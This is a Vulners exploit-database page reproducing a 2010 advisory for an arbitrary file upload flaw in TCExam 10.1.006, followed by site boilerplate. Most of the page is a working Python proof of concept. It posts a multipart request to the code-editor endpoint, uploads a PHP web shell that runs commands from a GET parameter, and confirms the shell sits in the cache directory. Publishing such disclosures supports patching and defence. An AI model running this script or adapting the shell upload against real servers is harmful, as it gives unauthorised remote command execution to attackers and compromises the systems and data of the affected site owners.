Vulners
Lucene search
TCExam 10.1.006 Shell Upload
`#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Arbitrary Upload #
# Software.................TCExam 10.1.006 #
# Download.................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=tcexam #
# Date.....................6/1/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# [email protected] #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited #
# to upload a PHP shell. #
# #
# #
# ##Proof of Concept## #
# #
import sys, socket
host = 'localhost'
tc_exam = 'http://' + host + '/TCExam'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
content = '------x\r\n'\
'Content-Disposition: form-data; name="sendfile0"\r\n'\
'\r\n'\
'shell.php\r\n'\
'------x\r\n'\
'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
'Content-Type: application/octet-stream\r\n'\
'\r\n'\
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
'------x--\r\n'\
'\r\n'
header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
'Host: ' + host + '\r\n'\
'Proxy-Connection: keep-alive\r\n'\
'User-Agent: x\r\n'\
'Content-Length: ' + str(len(content)) + '\r\n'\
'Cache-Control: max-age=0\r\n'\
'Origin: null\r\n'\
'Content-Type: multipart/form-data; boundary=----x\r\n'\
'Accept: text/html\r\n'\
'Accept-Encoding: gzip,deflate,sdch\r\n'\
'Accept-Language: en-US,en;q=0.8\r\n'\
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
'Cookie: LastVisit=1275442604\r\n'\
'\r\n'
s.send(header + content)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in s.recv(8192):
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
if http_ok not in s.recv(8192): print 'shell not found'
else: print 'shell located at ' + tc_exam + '/cache/shell.php'
upload_shell()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2010 00:00Current
7.4High risk
Vulners AI Score7.4